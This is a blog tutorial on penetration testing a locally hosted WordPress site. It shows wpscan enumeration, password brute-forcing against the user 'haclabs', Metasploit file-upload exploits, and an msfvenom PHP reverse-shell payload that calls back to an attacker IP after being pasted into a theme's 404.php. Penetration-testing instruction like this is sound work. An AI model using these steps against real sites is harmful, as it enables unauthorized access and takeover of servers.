top of page
Search

Wordpress penetration testing

In this article we will see how we can enumerate a wordpress website and how we can find login credentials of a particular website . In this tutorial we will use wpscan tool available in Kali Linux OS.


Table of Content :

  1. Introduction to WPscan

  2. Normal Scan

  3. Enumerating plugins

  4. Enumerating vulnerable plugins

  5. Enumerating themes

  6. Enumerating vulnerable themes

  7. Getting a session using metasploit

  8. Enumerating users and finding credentials

  9. Uploading a file to get reverse shell

  10. Uploading a payload


Introduction to WPscan

use this link to get the latest version git clone https://github.com/wpscanteam/wpscan.git then change directory to wpscan using cd command and then go to bin directory and from there we will execute wpscan


this tool performs black box testing to find vulnerable wordpress themes ,plugins and version.


Normal Scan

In this section will try to find the wordpress version by using a simple command.

We have detected the Wordpress version successfully. Command used :

./wpscan --url http://127.0.0.1

Please change the URL of the targeted website. As I am hosting a wordpress website on my local machine so i have used this URL


Enumerating plugins

Plugins are a small piece of code of a program which can be added to a WordPress website to extend its functionality.

With the help of command : ./wpscan --url http://127.0.0.1 --enumerate p

we can easily find installed plugins on the target wordpress website, as shown in the image


Enumerating vulnerable plugins

In this case only a single plugin is present so not a problem and this can be vulnerable. But if we detect so many plugins then by running the command

./wpscan --url http://127.0.0.1 --enumerate vp

we can detect vulnerable plugins installed in the wordpress website.


Enumerating themes

theme controls overall look of the website like font ,font color,font size and other things.

Now in the same fashion we can detect Wordpress themes installed . command used:

./wpscan --url http://127.0.0.1 --enumerate t


Enumerating vulnerable themes

To scan the installed vulnerable theme of WordPress website type following command: ./wpscan --url http://127.0.0.1 --enumerate vt

No vulnerable themes find.


Getting a session using meteasploit

We have detected a vulnerable plugin so after searching in the metasploit we found a exploit for the vulnerable plugin and we will use that exploit to get a session.

exploit used : exploit/unix/webapp/wp_reflexgallery_file_upload

We can see that we have successfully opened a meterpreter session


Enumerating users and finding credentials

There is a page in wordpress website to login into the panel of website ,from there we can control the complete website and it is http://127.0.0.1/wp-login.php

Now to login into the main panel we need username and password and for that we need to find username . To find username we will use the command:

./wpscan --u http://127.0.0.1 --enumerate u

there exists a user with username haclabs . So its time to find the password for this user "haclabs" and for that we will use bruteforce approach by using the list /usr/share/wordlists/rockyou.txt

command used : ./wpscan --url http://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -U haclabs


username : haclabs

password : 987654321

Done!! we have now user credentials and we can use them to login into the main panel of the website.


Uploading a file to get reverse shell


In this section we are going to create a malicious php file that will give us the shell when executed on the website . let's create the file first using msfvenom

command used: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -f raw

where lhost is the IP of your kali linux machine (attacker machine) and lport is the port to listen on.

Now copy the highlighted part. now we go the page http://127.0.0.1/wp-login.php to login into the panel by using the credentials we have found earlier.

we can see that after using these credentials we logged in successfully .


Now go to Appearance -> Theme Editor->select theme to edit then select the theme which is active currently and then go to 404 template to edit the file 404.php and paste the malicious code there.

click on update and file.now we will open metasploit to get the session first of all let's setup all the things and then we will execute this theme by using the link : http://127.0.0.1/wp-content/themes/online-portfolio/404.php

in this case activated theme is online-portfolio ,so please change it with the name of currently active theme if active theme is different from this otherwise everything will remain as it is.

we succeed in getting a meterpreter session!


Uploading a payload

we know the credentials of user haclabs so here we are going to upload a payload to get the meterpreter session by using the exploit : exploit/unix/webapp/wp_admin_shell_upload

and exploit!! we have a meterpreter session!!!

So this was all about wordpress penetration testing.

0 comments

Recent Posts

See All

As you all know that our website is providing walkthrough of different challenges from different platforms and without any advertisement but due to some funds issue we can't continue this website :( S

bottom of page